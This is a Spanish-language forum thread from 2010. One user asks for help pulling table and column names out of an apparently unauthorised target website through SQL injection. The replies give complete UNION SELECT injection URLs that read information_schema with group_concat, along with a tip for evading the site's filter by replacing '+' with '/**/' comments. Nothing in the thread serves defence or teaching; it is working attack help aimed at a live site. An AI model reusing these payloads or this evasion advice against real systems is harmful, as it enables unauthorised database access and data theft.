[Problema en SQL Inyect]

ChiikoMorocho · 26 Abril 2010, 23:13 PM

estoy intentando obtener los nombres de las tablas en una web vul. a SQLi, pero no logro avanzar, me detiene cuando inyecto: +from+information_schema.tables+where+table_schema='cebd'--

cuando hago esto, no importa sino agrego el +limit+0,1-- me aparece el la pagina un error diciendo 503 la pagina no esta disponible, vuelva mas tarde entre otras cosas...

no se como sacarlas... intente poner la base de datos "cebd" en ASCII pero lo mismo...

alguna ayuda?.......

Es vulnerable y hasta aqui me arroja las tablas 2,4,10 lo mas bien.,,:

http://www.webvul.com/xxx_xxx/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--

y tambien he conseguido el nombre de la BD inyectando, asi que no logro deducir cual sea mi error...

------------------------------------------------

soez · 27 Abril 2010, 10:28 AM

No se que numero te aparece cuando pones esto

http://www.webvul.com/xxx_xxx/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--

si es el 2 por ejemplo para sacar las tablas seria

http://www.webvul.com/xxx_xxx/index.php?id=-1+union+select+1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13+from+information_schema.tables--

para sacar las columnas seria

http://www.webvul.com/xxx_xxx/index.php?id=-1+union+select+1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13+from+information_schema.columns+where+table_name=char(nombre de la tabla en ascii separado por comas)--

ahi ya la tendras

PD. Si no ves todos los nombres en la pantalla mira el codigo fuente

ChiikoMorocho · 28 Abril 2010, 20:11 PM

ok flaco, gracias.se que es asi e intente saber las tablas y columnas pero me aparecia error en la pagina...revise bien la inyeccion y no hay errores...probare de nuevo aver q sucede..
luego comento.. =/

ChiikoMorocho · 28 Abril 2010, 21:13 PM

Mira cuando intento agregar a la inyeccion para que me de las tablas y/o columnas.. me aparece esto:

--

Service Temporarily Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

alexkof158 · 29 Abril 2010, 10:32 AM

Cita de: ChiikoMorocho en 28 Abril 2010, 21:13 PM
Mira cuando intento agregar a la inyeccion para que me de las tablas y/o columnas.. me aparece esto:

--
Service Temporarily Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

debe ser los filtros que utiliza para evitar inyecciones sql , intenta bypassear agregando caracter como /**/

ChiikoMorocho · 29 Abril 2010, 16:51 PM

no entiendo muy bien lo que me decis, pero si me das un ejemplo bienvenido...!!!

ah e intentado con BLIND pero el problema es ... obvio, al no conocer la tabla "el nombre" intento con algunos pero ninguno acepto, me sale error en todos...

si me das un ejemplo de como dices tu bypasseando..quiza logre algo.

xassiz_ · 1 Mayo 2010, 15:48 PM

Prueba cambiar los + por /**/